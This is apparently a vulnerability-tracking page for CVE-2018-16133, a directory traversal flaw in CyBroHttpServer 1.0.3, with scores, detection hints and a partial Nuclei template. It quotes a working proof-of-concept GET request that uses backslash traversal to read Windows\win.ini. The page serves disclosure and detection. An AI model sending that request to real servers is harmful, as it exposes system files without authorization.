CVE-2018-16133
published 2018-08-29CVE-2018-16133: Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal via a ../ in the URI.
PriorityP352medium5.3CVSS 3.0
AVNACLPRNUINSUCLINAN
EXPLOIT
EPSS
39.28%
98.4th percentile
Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal via a ../ in the URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cybrotech | cybrohttpserver | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect directory traversal attempts targeting CyBroHttpServer by matching HTTP GET requests containing backslash-dot-dot sequences (\..\) in the URI path. ↗
- →Confirm successful exploitation by checking HTTP response body for Windows win.ini landmark strings: 'bit app support', 'fonts', and 'extensions' all present together. ↗
- →The vulnerability is exploitable without authentication (PR:N, UI:N) over the network; monitor CyBroHttpServer (default port 8080) for traversal-pattern URIs. ↗
- ·The PoC was tested on Windows only; the traversal payload uses Windows-style backslashes and targets win.ini, so detection rules relying on forward-slash traversal patterns will miss this attack. ↗
- ·The Nuclei template requires 'unsafe: true' mode because the raw backslash-based URI is not standards-compliant HTTP; standard HTTP proxies or WAFs may normalize or block the request before it reaches the server. ↗
CVSS provenance
nvdv3.05.3MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
exploitdb·2018-08-30·CVSS 5.3
CVE-2018-16133 [MEDIUM] Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
---
# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
# Date: 2018-08-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE: CVE-2018-16133
# PoC
https://\..\..\..\..\Windows\win.ini
# CVE-2018-16133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133
https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.png
GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Fi
Nuclei
Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
nuclei·CVSS 5.3
CVE-2018-16133 [MEDIUM] Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.
Template:
id: CVE-2018-16133
info:
name: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
author: 0x_Akoko
severity: medium
description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3.
reference:
- https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-
No writeups or analysis indexed.
https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.pnghttps://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversalhttps://www.exploit-db.com/exploits/45303/https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.pnghttps://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversalhttps://www.exploit-db.com/exploits/45303/
2018-08-29
Published